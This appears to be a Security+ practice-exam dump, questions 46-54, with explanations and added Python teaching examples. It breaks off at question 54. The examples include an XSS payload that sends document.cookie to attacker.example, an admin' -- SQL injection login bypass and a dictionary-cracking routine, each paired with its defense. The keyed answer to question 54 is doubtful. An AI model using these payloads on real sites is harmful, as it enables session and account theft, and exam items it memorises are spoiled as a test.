CompTIA SY0-701 CompTIA Security+ Exam Dumps and Practice Test Questions Set 4 Q46-60
Question 46
Which type of attack attempts to intercept and potentially alter communications between two parties without their knowledge?
A) Man-in-the-middle (MITM)
B) Phishing
C) Ransomware
D) Trojan
Answer: A) Man-in-the-middle (MITM)
Explanation:
A man-in-the-middle attack (SY0-701 groups this under the broader term "on-path attack") occurs when an attacker inserts themselves into the communication path between two parties and can eavesdrop on, modify, or inject content into the conversation while both sides believe they are talking directly to each other. MITM attacks can target web sessions, email, or any network traffic, and the attacker captures data such as credentials, personal information, or session tokens. Common techniques include ARP spoofing on a local segment, DNS spoofing, SSL/TLS stripping (downgrading an HTTPS connection to plain HTTP), and eavesdropping on open or rogue Wi-Fi. Security+ candidates must understand MITM attacks because they show why encryption alone is not enough: the endpoints must also authenticate each other and verify the integrity of what they receive. By intercepting traffic, attackers compromise confidentiality, manipulate data, or impersonate one party to the other, creating both technical and operational risks.
Phishing, the second choice, is a social engineering attack aimed at tricking users into revealing credentials or sensitive data. Phishing requires user interaction and deception but does not intercept communications passively between two parties. While phishing can lead to MITM-like outcomes if credentials are stolen, it relies on manipulation rather than direct interception of traffic.
Ransomware, the third choice, encrypts files or locks systems to demand payment. It focuses on extortion rather than intercepting or altering communications. Ransomware affects availability and confidentiality of data on infected systems but does not involve monitoring or modifying real-time communications.
Trojans, the fourth choice, are malware disguised as legitimate programs to trick users into executing them. Trojans can facilitate MITM attacks if they install spyware or network manipulation tools, but they are not inherently interception attacks. Trojans require user execution, whereas MITM operates at the network or communication level to intercept traffic between parties.
The correct answer is man-in-the-middle because it specifically targets communications between two parties to intercept or alter data without their knowledge. Mitigation measures include end-to-end encryption with certificate verification, HSTS to prevent downgrades from HTTPS to HTTP, secure key management, and network monitoring for ARP and DNS anomalies. Security+ candidates must understand MITM to implement proactive measures, detect anomalies, and ensure communication integrity, demonstrating the importance of encryption and authentication in protecting sensitive communications.
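As an added example (not part of the original question set), the following Python script shows the host-side detection logic for ARP spoofing, the first MITM technique named above. It watches a sequence of ARP replies and flags the two signatures of an on-path attacker: an IP address suddenly claimed by a new MAC, and one MAC claiming several IPs (the gateway and the victim at once). The sample replies and the pinned gateway mapping are constructed for illustration; pinning is the host-side equivalent of a static ARP entry or Dynamic ARP Inspection on a switch.

```python
# Added example: detect ARP cache poisoning from a stream of ARP replies.
# Each reply claims "IP X is at MAC Y". A host should map to one MAC; a new
# MAC claiming a known IP, or one MAC claiming many IPs, is the MITM signal.
from collections import defaultdict

# Constructed sample replies, not a real capture: (sender_ip, sender_mac).
SAMPLE_REPLIES = [
    ("10.0.0.1", "aa:bb:cc:00:00:01"),   # real gateway announces itself
    ("10.0.0.20", "aa:bb:cc:00:00:20"),  # a workstation
    ("10.0.0.1", "de:ad:be:ef:00:99"),   # attacker claims the gateway's IP
    ("10.0.0.20", "de:ad:be:ef:00:99"),  # attacker also claims the workstation
]

# Hypothetical pinned mapping for the gateway (assumption for this example).
TRUSTED = {"10.0.0.1": "aa:bb:cc:00:00:01"}


def detect_arp_spoof(replies, trusted=None):
    """Return a list of alert strings for the given sequence of ARP replies."""
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        # 1. A pinned address must never be claimed by a different MAC.
        if trusted and ip in trusted and trusted[ip].lower() != mac:
            alerts.append(f"pinned {ip} claimed by {mac}, expected {trusted[ip]}")
        # 2. An IP we have already seen changes to a new MAC.
        if ip_to_macs[ip] and mac not in ip_to_macs[ip]:
            alerts.append(f"{ip} changed to {mac}, previously {sorted(ip_to_macs[ip])}")
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
        # 3. One MAC answering for several IPs: the classic two-sided poison.
        if len(mac_to_ips[mac]) > 1:
            alerts.append(f"{mac} claims several IPs: {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_REPLIES, TRUSTED):
        print("ALERT:", alert)
```

Legitimate traffic (the first two replies alone) produces no alerts; the attacker's two replies produce three, or four when the gateway mapping is pinned. In production the same logic runs over `arp -a` snapshots or a packet capture, and the pinned table is what a switch enforces with DHCP snooping plus Dynamic ARP Inspection.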
Question 47
Which type of attack targets weaknesses in user passwords to gain unauthorized access to systems?
A) Dictionary attack
B) SQL injection
C) Cross-site scripting
D) Worm
Answer: A) Dictionary attack
Explanation:
A dictionary attack is a method where attackers attempt to gain unauthorized access by systematically trying words from a precompiled list of common passwords or dictionary words, usually with "mangling rules" that append digits, capitalize the first letter, or substitute symbols. Unlike brute-force attacks, which attempt all possible combinations, dictionary attacks focus on likely password choices, taking advantage of weak or predictable passwords. Automated tools accelerate this process, and attackers often combine dictionary attacks with password lists obtained from previous breaches. The attack can be run online against a login form or offline against stolen password hashes; offline attacks against fast, unsalted hashes are the most dangerous because nothing throttles the guessing. Security+ candidates must understand dictionary attacks because they emphasize the importance of strong, complex passwords, password policies, and multi-factor authentication. A successful dictionary attack can compromise accounts, expose sensitive data, and allow lateral movement within networks. Organizations mitigate this threat by enforcing password length and complexity, screening new passwords against dictionary and breached-password lists, applying account lockouts or progressive throttling, storing passwords with a salted, slow hash, and monitoring failed login attempts. Forced periodic expiration was once standard but is no longer recommended by NIST SP 800-63B, because it tends to produce predictable incremental passwords.
SQL injection, the second choice, is a web application vulnerability that manipulates databases through unsanitized inputs. While SQL injection can extract passwords from databases, it does not systematically guess passwords; it exploits technical flaws in applications rather than weak password selection.
Cross-site scripting, the third choice, injects malicious scripts into web pages to compromise users. XSS primarily targets session tokens, cookies, and user interactions within a website, not password guessing. While it may indirectly lead to credential theft, it is not focused on brute-force password attacks.
Worms, the fourth choice, are self-replicating malware that spread across networks without user action. Worms do not attempt to guess passwords; their primary goal is propagation, often delivering other payloads such as ransomware or Trojans.
The correct answer is dictionary attack because it specifically targets weak or predictable passwords to gain unauthorized access. Security+ candidates should understand attack techniques, automated tools, and mitigation strategies, including complex passwords, multi-factor authentication, and monitoring of login attempts. Dictionary attacks illustrate the vulnerability of predictable credentials and the importance of password hygiene in organizational security.
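The following Python script is an added example (not from the original page) of what the explanation describes: an offline dictionary attack, with simple mangling rules, run against a small constructed database of stolen password hashes, first unsalted and then salted, followed by the enrollment-time screen that rejects any password the same wordlist would recover. The wordlist, users, passwords and salts are all constructed; SHA-256 is used only because it is in the standard library and is fast, which is exactly what makes it a poor password hash.

```python
import hashlib

# Constructed attacker wordlist (real ones have millions of entries).
WORDLIST = ["123456", "password", "letmein", "qwerty", "summer", "welcome"]


def mangle(word):
    """Rules a cracking tool applies to each word: as-is, capitalised, common suffixes."""
    yield word
    yield word.capitalize()
    for suffix in ("1", "123", "!", "2024"):
        yield word + suffix
        yield word.capitalize() + suffix


def sha256_hex(password, salt=""):
    # Deliberately fast hashing to show why it is weak for password storage.
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed victim database: two users chose dictionary-derived passwords.
VICTIM_PASSWORDS = {"alice": "Password1", "bob": "qwerty123", "carol": "Tr0ub4dor&3"}
UNSALTED_DB = {u: sha256_hex(p) for u, p in VICTIM_PASSWORDS.items()}
SALTS = {"alice": "k3x9", "bob": "q0pz", "carol": "m7ty"}  # constructed per-user salts
SALTED_DB = {u: sha256_hex(p, SALTS[u]) for u, p in VICTIM_PASSWORDS.items()}


def dictionary_attack(target_db, wordlist, salts=None):
    """Offline attack against stolen hashes. Returns {user: recovered_password}."""
    cracked = {}
    if salts is None:
        # Unsalted: hash every candidate once, then look up every user in O(1).
        table = {sha256_hex(c): c for w in wordlist for c in mangle(w)}
        for user, digest in target_db.items():
            if digest in table:
                cracked[user] = table[digest]
    else:
        # Salted: no shared table; each user costs a full pass over the wordlist.
        for user, digest in target_db.items():
            for w in wordlist:
                hit = next((c for c in mangle(w) if sha256_hex(c, salts[user]) == digest), None)
                if hit is not None:
                    cracked[user] = hit
                    break
    return cracked


def is_dictionary_password(candidate, wordlist):
    """Enrollment-time screen: reject anything the mangled wordlist would hit."""
    return any(candidate == c for w in wordlist for c in mangle(w))


if __name__ == "__main__":
    print("unsalted:", dictionary_attack(UNSALTED_DB, WORDLIST))
    print("salted:  ", dictionary_attack(SALTED_DB, WORDLIST, SALTS))
    print("screen rejects Password1:", is_dictionary_password("Password1", WORDLIST))
```

Salting defeats the precomputed table but not the attack itself: both runs recover alice's and bob's passwords, and only the password that is not derivable from the wordlist survives. What actually raises the attacker's cost is a slow, memory-hard function with a per-user salt (`hashlib.scrypt` or `hashlib.pbkdf2_hmac` in the standard library, or bcrypt/Argon2), so that each guess costs tens of milliseconds instead of nanoseconds.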
Question 48
Which type of attack modifies DNS responses to redirect users to malicious websites?
A) DNS spoofing
B) Ransomware
C) Phishing
D) Rootkit
Answer: A) DNS spoofing
Explanation:
DNS spoofing, of which DNS cache poisoning is the best-known form, is an attack in which attackers forge DNS responses to redirect users to malicious websites. By injecting false records into a resolver's cache or answering a client's query before the real server does, attackers can make legitimate domain names resolve to IP addresses they control. Users may unknowingly provide sensitive information, download malware, or access fraudulent sites. DNS spoofing impacts confidentiality, integrity, and trust in network communications. Security+ candidates must understand DNS spoofing because it demonstrates how attackers can manipulate fundamental network services to conduct widespread attacks and gain unauthorized access to user data. Preventive measures include DNSSEC (which signs records so forged answers fail validation), resolvers that randomize transaction IDs and source ports so a forged reply is unlikely to match an outstanding query, encrypted transports such as DNS over TLS or HTTPS, monitoring for unexpected DNS changes, and secure configurations.
Ransomware, the second choice, encrypts or locks files to demand payment. While ransomware may be delivered via phishing links or malicious websites, it does not manipulate DNS directly to redirect traffic. Its focus is on extortion rather than infrastructure manipulation.
Phishing, the third choice, involves deceiving users to obtain sensitive information. Phishing attacks may rely on fake websites, but usually require users to click links rather than redirecting users via DNS manipulation. DNS spoofing can enhance phishing effectiveness, but it is a distinct technical attack.
Rootkits, the fourth choice, are stealthy malware designed to maintain persistent access and hide malicious activity. Rootkits do not target DNS infrastructure; their purpose is persistence and concealment on compromised hosts.
The correct answer is DNS spoofing because it directly manipulates domain name resolution to redirect users to malicious websites. Security+ candidates should understand attack methods, monitoring strategies, and protective measures such as DNSSEC, system integrity checks, and network monitoring to prevent DNS-based attacks. Awareness of DNS spoofing underscores the importance of trust verification, secure network configurations, and proactive monitoring in defending critical infrastructure.
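As an added example (not part of the original page), the following Python script builds a minimal DNS query and A-record response with the standard library's `struct` module and then applies the checks a resolver performs before it accepts an answer: matching transaction ID, QR bit set, the echoed question identical to the one sent, and an answer that is actually for the queried name. It then shows the limit of those checks: a forged response with a correctly guessed 16-bit transaction ID is accepted, which is why source-port randomization and DNSSEC exist. All names and addresses are constructed (documentation ranges); nothing is sent on the network.

```python
import struct


def encode_name(name):
    # 'example.com' -> 07 'example' 03 'com' 00 (length-prefixed labels).
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def build_query(txid, name):
    # Header: ID, flags (RD=1), QDCOUNT=1, AN/NS/AR=0; then one A/IN question.
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def build_response(txid, name, ipv4):
    # Flags 0x8180: QR=1, RD=1, RA=1. One question echoed, one A answer whose
    # owner name is a compression pointer (0xC00C) back to the question name.
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(o) for o in ipv4.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, len(rdata)) + rdata
    return header + question + answer


def parse_name(msg, off):
    """Decode a (possibly compressed) name; return (name, offset_after_name)."""
    labels = []
    while True:
        ln = msg[off]
        if ln == 0:
            return ".".join(labels), off + 1
        if ln & 0xC0 == 0xC0:  # compression pointer into the message
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = parse_name(msg, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(msg[off + 1:off + 1 + ln].decode())
        off += 1 + ln


def validate_response(query, response):
    """Accept a response only if it matches the outstanding query.
    Returns the A-record IPv4 string, or raises ValueError."""
    q_id, _, q_qd = struct.unpack("!HHH", query[:6])
    r_id, r_flags, r_qd, r_an = struct.unpack("!HHHH", response[:8])
    if r_id != q_id:
        raise ValueError("transaction ID mismatch")
    if not r_flags & 0x8000:
        raise ValueError("QR bit clear: not a response")
    if q_qd != 1 or r_qd != 1 or r_an < 1:
        raise ValueError("unexpected section counts")
    q_name, q_end = parse_name(query, 12)
    r_name, r_end = parse_name(response, 12)
    if (q_name.lower(), query[q_end:q_end + 4]) != (r_name.lower(), response[r_end:r_end + 4]):
        raise ValueError("question section does not match the query")
    a_name, a_off = parse_name(response, r_end + 4)
    rtype, _, _, rdlen = struct.unpack("!HHIH", response[a_off:a_off + 10])
    if a_name.lower() != q_name.lower() or rtype != 1 or rdlen != 4:
        raise ValueError("answer is not an A record for the queried name")
    rdata = response[a_off + 10:a_off + 10 + rdlen]
    return ".".join(str(b) for b in rdata)


def is_accepted(query, response):
    try:
        validate_response(query, response)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    q = build_query(0x1234, "example.com")
    print("legit:", validate_response(q, build_response(0x1234, "example.com", "198.51.100.7")))
    print("wrong txid accepted?", is_accepted(q, build_response(0x1235, "example.com", "203.0.113.66")))
    print("guessed txid accepted?", is_accepted(q, build_response(0x1234, "example.com", "203.0.113.66")))
```

The last line is the point: once the attacker guesses the transaction ID (1 in 65,536 per forged packet, which a flood of replies makes practical), nothing in the unsigned protocol distinguishes the forgery from the real answer. Adding the randomized UDP source port to the check raises the guess space to roughly 2^32, and DNSSEC validation rejects the forged record outright because it carries no valid signature.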
Question 49
Which type of attack involves injecting malicious code into a web application to manipulate its behavior?
A) SQL injection
B) Phishing
C) Brute-force
D) DDoS
Answer: A) SQL injection
Explanation:
SQL injection is a web application attack that occurs when an attacker supplies input containing SQL syntax to an application that builds its queries by concatenating untrusted input into the query text, so the input is executed as part of the statement. It allows attackers to read, modify, or delete database records, escalate privileges, or bypass authentication mechanisms, and it can compromise the confidentiality, integrity, and availability of data. Security+ candidates must understand SQL injection because it demonstrates the importance of secure coding practices: parameterized (prepared) statements are the primary fix, with input validation, least-privilege database accounts, and proper database configuration as supporting controls. Attackers may also combine SQL injection with other attacks, such as privilege escalation or lateral movement, making it a high-risk vulnerability in web environments.
Phishing, the second choice, is a social engineering technique aimed at obtaining credentials or sensitive information from users. Phishing relies on deception, not exploiting application code or database queries. While it can result in similar outcomes like account compromise, it is fundamentally different from SQL injection.
Brute-force attacks, the third choice, attempt to guess passwords or encryption keys systematically. Brute-force focuses on authentication credentials rather than exploiting web application vulnerabilities to manipulate data. SQL injection targets technical flaws in input handling, not the password guessing process.
DDoS attacks, the fourth choice, overwhelm systems with traffic to make them unavailable. While DDoS targets availability, SQL injection primarily targets data confidentiality and integrity. DDoS does not manipulate database queries or extract information.
The correct answer is SQL injection because it directly exploits web application input validation flaws to manipulate database behavior. Security+ candidates should understand prevention techniques, secure coding practices, and input validation methods to protect web applications. SQL injection emphasizes the critical need for secure software development life cycle processes, regular code review, and monitoring for suspicious queries to maintain database security and system integrity.
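The following Python script is an added example (not from the original page) of the authentication-bypass case described above, using the standard library's in-memory SQLite database. `login_vulnerable` builds the query by string concatenation, so a username of `admin' --` turns the password check into a SQL comment; `login_safe` is the same logic with a parameterized query, where the quote and the comment marker are just characters in a value. The accounts are constructed, and SHA-256 stands in for a real password hash only to keep the example dependency-free.

```python
import hashlib
import sqlite3


def setup_db():
    """Constructed sample database with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    for user, pw in (("alice", "correct horse"), ("admin", "Sup3rS3cret!")):
        conn.execute("INSERT INTO users VALUES (?, ?)",
                     (user, hashlib.sha256(pw.encode()).hexdigest()))
    return conn


def login_vulnerable(conn, username, password):
    """Query text built from user input: the input becomes SQL syntax."""
    h = hashlib.sha256(password.encode()).hexdigest()
    sql = f"SELECT username FROM users WHERE username = '{username}' AND pw_hash = '{h}'"
    # With username = "admin' --" the statement becomes:
    #   ... WHERE username = 'admin' --' AND pw_hash = '<hash>'
    # and everything after "--" is a comment, so the password is never checked.
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: values travel separately from the SQL text."""
    h = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, h),
    ).fetchone()
    return row[0] if row else None


INJECTION = "admin' --"  # constructed payload for the demonstration

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable, injected:", login_vulnerable(db, INJECTION, "anything"))  # admin
    print("safe, injected:      ", login_safe(db, INJECTION, "anything"))        # None
    print("safe, real creds:    ", login_safe(db, "alice", "correct horse"))     # alice
```

The parameterized version needs no blacklist of dangerous characters: the database driver never parses the values as SQL. Input validation still matters for other reasons (length, expected character set), but it is a defense in depth layer, not the fix.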
Question 50
Which attack method installs malware that remains hidden while providing unauthorized access?
A) Rootkit
B) Worm
C) Adware
D) Phishing
Answer: A) Rootkit
Explanation:
A rootkit is a type of malware designed to provide attackers with persistent, hidden access to a system. It often integrates deeply into the operating system, modifying kernel-level processes, system files, or security controls to evade detection. Rootkits allow attackers to install additional malware, capture credentials, or monitor activity without triggering antivirus or monitoring tools. They are difficult to detect and often require specialized forensic tools or system restoration to remove. Security+ candidates must understand rootkits because they exemplify persistent threats and the importance of endpoint protection, integrity monitoring, secure boot mechanisms, and proactive incident response. Rootkits compromise confidentiality, integrity, and in some cases, availability, making them a critical concern for security professionals.
Worms, the second choice, self-replicate and propagate across networks without hiding their presence. While worms can deliver rootkits as payloads, they do not inherently conceal themselves like rootkits. The primary purpose of worms is distribution rather than stealth.
Adware, the third choice, delivers unwanted advertisements and may collect user data. Adware is generally visible to the user and does not provide hidden administrative control or persistent unauthorized access, differentiating it from rootkits.
Phishing, the fourth choice, is a social engineering attack designed to trick users into revealing sensitive information. Phishing does not provide ongoing hidden access or manipulate system processes; it relies on deception rather than system-level stealth.
The correct answer is rootkit because it is specifically designed to remain hidden while granting unauthorized access. Security+ candidates should understand rootkit detection, removal strategies, and preventive measures such as system integrity verification, endpoint protection, and monitoring for anomalous behavior. Rootkits illustrate the dangers of persistent malware and underscore the importance of layered defenses to maintain system security and integrity.
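As an added example (not from the original page) of the integrity monitoring the explanation calls for, the following Python script takes a trusted baseline of file hashes and permission bits, rescans, and reports what was modified, added or removed. The `demo` function constructs a scenario in a temporary directory standing in for a system root: a user-mode rootkit trojans `ls`, drops a hidden shared object, points `/etc/ld.so.preload` at it (a common user-mode persistence mechanism), and deletes the audit daemon. File names and contents are constructed placeholders.

```python
import hashlib
import os
import tempfile


def hash_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map every file under root to (sha256, permission bits), keyed by relative path."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            snap[rel] = (hash_file(full), os.stat(full).st_mode & 0o7777)
    return snap


def diff_snapshots(baseline, current):
    """Classify drift between a trusted baseline and a fresh scan."""
    return {
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def _write(root, rel, data, mode=0o755):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as f:
        f.write(data)
    os.chmod(full, mode)


def demo():
    """Constructed scenario: baseline a fake root, then simulate a user-mode
    rootkit installing itself. Returns the diff the monitor would report."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "bin/ls", b"ELF original ls")
        _write(root, "bin/auditd", b"ELF auditd")
        _write(root, "etc/ld.so.preload", b"", mode=0o644)
        baseline = snapshot(root)

        _write(root, "bin/ls", b"ELF trojaned ls that hides the attacker's files")
        _write(root, "lib/.hidden.so", b"ELF loader")
        _write(root, "etc/ld.so.preload", b"/lib/.hidden.so\n", mode=0o644)
        os.remove(os.path.join(root, "bin/auditd"))
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Two caveats a practitioner would add. First, the baseline must be stored off-host or signed, otherwise the attacker simply rehashes. Second, a kernel-mode rootkit can hook the very system calls this scanner uses and return the original bytes for a trojaned file, so a scan from a trusted boot medium (or a hash comparison against a known-good image) is the authoritative check; Secure Boot and measured boot protect the stages that run before any scanner can.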
Question 51
Which security control aims to limit access to sensitive data by encrypting it, making it unreadable without a key?
A) Encryption
B) Firewall
C) Intrusion detection system
D) Antivirus
Answer: A) Encryption
Explanation:
Encryption is a security control used to protect sensitive data by transforming it into an unreadable format unless the correct decryption key is applied. Encryption ensures confidentiality, one of the core elements of the CIA triad, and protects data at rest, in transit, or in use. Common encryption methods include symmetric encryption, where a single key is used for both encryption and decryption, and asymmetric encryption, which uses a public key for encryption and a private key for decryption. Security+ candidates must understand encryption because it provides critical protection against unauthorized data access, man-in-the-middle attacks, data theft, and information leakage. Encrypted communications, such as HTTPS for web traffic, secure email protocols, and virtual private networks, ensure that intercepted data cannot be interpreted without proper authorization.
Firewalls, the second choice, are preventive network controls that filter traffic based on defined rules. Firewalls do not encrypt data; they control access to networks and prevent unauthorized connections. While firewalls protect systems from external threats, they do not inherently make data unreadable to unauthorized users.
Intrusion detection systems, the third choice, monitor network traffic or system activities to detect suspicious behavior or potential attacks. IDS alerts administrators but does not provide confidentiality for sensitive data. Detection and encryption serve different purposes: IDS identifies potential threats, while encryption safeguards information from unauthorized access.
Antivirus software, the fourth choice, detects, removes, or quarantines malware on endpoints. Antivirus protects systems against malicious software but does not encrypt data to prevent unauthorized reading. While antivirus software contributes to overall security, it does not replace encryption for confidentiality.
The correct answer is encryption because it specifically ensures that data remains unreadable without authorized access. Security+ candidates should understand encryption algorithms, key management practices, and applications across file storage, network communications, and databases. Encryption helps mitigate the impact of data breaches, secures sensitive information from unauthorized disclosure, and supports compliance with regulatory standards. Implementing encryption effectively involves selecting strong algorithms, safeguarding keys, and ensuring that decrypted data is only available to authorized users, emphasizing its role as a cornerstone of data security strategies.
Question 52
Which type of attack attempts to flood a network with traffic to make systems unavailable to legitimate users?
A) Denial of Service (DoS)
B) Keylogger
C) Trojan
D) Cross-site scripting
Answer: A) Denial of Service (DoS)
Explanation:
A denial of service attack is a cyberattack aimed at disrupting the availability of systems, networks, or applications by overwhelming them with excessive traffic or requests. DoS attacks consume resources such as CPU, memory, or bandwidth, rendering services inaccessible to legitimate users. Attackers may use automated scripts or exploit vulnerabilities to amplify the attack, impacting organizational operations, reputation, and revenue. Security+ candidates must understand DoS attacks because they illustrate the importance of monitoring, traffic filtering, redundancy, and incident response planning to ensure system availability. DoS attacks target the availability component of the CIA triad, and mitigation may involve firewalls, intrusion prevention systems, rate limiting, and cloud-based DDoS protection services.
Keyloggers, the second choice, capture user keystrokes to steal credentials or other sensitive data. Keyloggers compromise confidentiality, not availability. They operate stealthily on endpoints rather than overwhelming network resources to deny service.
Trojans, the third choice, are malware disguised as legitimate applications to trick users into executing them. Trojans may deliver additional payloads, but do not inherently generate traffic to disrupt service. They rely on user interaction rather than automated flooding.
Cross-site scripting, the fourth choice, injects malicious scripts into web applications to manipulate user sessions or steal cookies. XSS targets the integrity and confidentiality of user data rather than network availability. It requires user interaction on a vulnerable web application, not resource exhaustion.
The correct answer is denial of service because it explicitly targets availability by flooding systems or networks. Security+ candidates should understand the techniques, detection methods, and mitigation strategies for DoS attacks, including the importance of layered defenses, redundant infrastructure, and proactive traffic monitoring. Understanding DoS attacks reinforces the principle of maintaining system resilience and service continuity under high-volume attack conditions.
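The following Python script is an added example (not from the original page) of the rate limiting mentioned as a mitigation: a per-client token bucket that lets a legitimate client through at its normal pace while absorbing a burst flood from a single source. The traffic is constructed: one client sending one request per second for twenty seconds, and a flooder sending two bursts of one hundred requests two seconds apart. The thresholds (5 requests per second sustained, burst of 10) are assumptions chosen for the demonstration.

```python
class TokenBucket:
    """Allow `burst` requests at once, then refill `rate` tokens per second."""

    def __init__(self, rate, burst):
        self.rate, self.burst = rate, burst
        self.tokens, self.last = float(burst), None

    def allow(self, now):
        if self.last is None:
            self.last = now
        # Refill proportionally to elapsed time, never beyond the burst size.
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


class PerClientLimiter:
    """One bucket per client key (here a source IP) so one flooder cannot
    exhaust the budget of everyone else."""

    def __init__(self, rate, burst):
        self.rate, self.burst, self.buckets = rate, burst, {}

    def allow(self, client, now):
        bucket = self.buckets.setdefault(client, TokenBucket(self.rate, self.burst))
        return bucket.allow(now)


def simulate(requests, rate=5.0, burst=10):
    """requests: iterable of (timestamp_seconds, client_id).
    Returns {client: (served, dropped)}."""
    limiter = PerClientLimiter(rate, burst)
    stats = {}
    for ts, client in sorted(requests, key=lambda r: r[0]):
        served, dropped = stats.get(client, (0, 0))
        if limiter.allow(client, ts):
            served += 1
        else:
            dropped += 1
        stats[client] = (served, dropped)
    return stats


# Constructed traffic (documentation-range addresses, not real clients).
LEGIT_TRAFFIC = [(float(t), "198.51.100.10") for t in range(20)]
FLOOD_TRAFFIC = [(0.0, "203.0.113.5")] * 100 + [(2.0, "203.0.113.5")] * 100

if __name__ == "__main__":
    for client, (served, dropped) in simulate(LEGIT_TRAFFIC + FLOOD_TRAFFIC).items():
        print(f"{client}: served={served} dropped={dropped}")
```

The legitimate client is served every time; the flooder gets the burst allowance and the refill, and the other 180 requests are dropped at the edge before they consume application resources. This controls application-layer floods from a manageable number of sources. A volumetric DDoS that saturates the uplink itself has to be absorbed upstream, which is what the cloud-based scrubbing services named above do.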
Question 53
Which type of attack occurs when an attacker injects scripts into web pages viewed by other users?
A) Cross-site scripting (XSS)
B) Phishing
C) Ransomware
D) Worm
Answer: A) Cross-site scripting (XSS)
Explanation:
Cross-site scripting is a web application attack in which an attacker injects malicious scripts into web pages. When users access these pages, the script executes within their browser, with the origin and privileges of the vulnerable site, potentially stealing session cookies, redirecting them to malicious sites, or performing unauthorized actions. The three variants are stored XSS (the payload is saved by the application and served to later visitors), reflected XSS (the payload in a crafted request is echoed straight back), and DOM-based XSS (client-side script writes untrusted data into the page). XSS exploits insufficient input validation and, above all, missing output encoding in web applications, allowing attackers to target end users rather than directly attacking servers. Security+ candidates must understand XSS because it demonstrates the importance of secure coding practices, input sanitization, and browser security. XSS affects confidentiality, integrity, and trust in web applications and can lead to account compromise or credential theft if not mitigated. Preventive measures include validating inputs, encoding outputs for the context in which they are rendered, setting the HttpOnly flag on session cookies, deploying a Content Security Policy, and monitoring for unusual activity on web applications.
Phishing, the second choice, is a social engineering attack designed to trick users into providing sensitive information. Phishing relies on deception, such as emails or fake websites, rather than executing scripts in users’ browsers. While phishing can result in similar outcomes like credential theft, it does not involve web application vulnerabilities.
Ransomware, the third choice, encrypts files or systems to demand payment. It affects availability and confidentiality but does not inject scripts into web pages. Ransomware relies on user action or system vulnerabilities rather than exploiting web input/output flaws like XSS.
Worms, the fourth choice, are self-replicating malware that propagate across networks without user intervention. Worms focus on spreading and may carry additional payloads, but they do not execute scripts within users’ browsers or target web page content.
The correct answer is cross-site scripting because it specifically involves injecting malicious scripts into web pages for execution by end users. Security+ candidates should understand XSS attack vectors, prevention techniques, and the importance of input validation and output encoding. Recognizing XSS emphasizes the need for secure development practices and monitoring of web applications to maintain confidentiality, integrity, and user trust.
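The following Python script is an added example (not from the original page) of the output-encoding defense, rendered server-side. It shows a greeting and an input field rendered two ways: once by interpolating the user-controlled value directly, so a constructed payload becomes live markup, and once through `html.escape`, which is context-appropriate encoding for HTML body text and for double-quoted attribute values. The payloads are constructed for illustration.

```python
import html

# Constructed payloads. The first breaks out of element content; the second
# breaks out of a quoted attribute and plants an event handler.
BODY_PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_vulnerable(name):
    # Untrusted text dropped straight into the page body.
    return f"<p>Hello, {name}!</p>"


def render_safe(name):
    # html.escape turns < > & " ' into entities, so the browser sees text.
    return f"<p>Hello, {html.escape(name)}!</p>"


def render_attr_vulnerable(value):
    # Untrusted text inside a double-quoted attribute.
    return f'<input name="q" value="{value}">'


def render_attr_safe(value):
    # quote=True (the default) also escapes the quotes that would close the attribute.
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def attribute_count(markup):
    """Crude check used below: number of double quotes in the rendered tag.
    A correctly encoded attribute leaves exactly the quotes the template wrote."""
    return markup.count('"')


if __name__ == "__main__":
    print(render_vulnerable(BODY_PAYLOAD))
    print(render_safe(BODY_PAYLOAD))
    print(render_attr_vulnerable(ATTR_PAYLOAD))
    print(render_attr_safe(ATTR_PAYLOAD))
```

Encoding has to match the output context: `html.escape` is right for element content and quoted attributes, but a value placed inside a `<script>` block, a URL, or a CSS property needs that context's own encoding, and a value written into the DOM client-side belongs in `textContent`, not `innerHTML`. A Content-Security-Policy that disallows inline scripts and an `HttpOnly` session cookie limit the damage when an encoding gap is missed.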
Question 54
Which type of attack allows unauthorized users to gain access to systems by exploiting weak or default credentials?
A) Credential stuffing
B) Phishing
C) DDoS
D) Rootkit
Answer: A) Credential stuffing
Explanation:
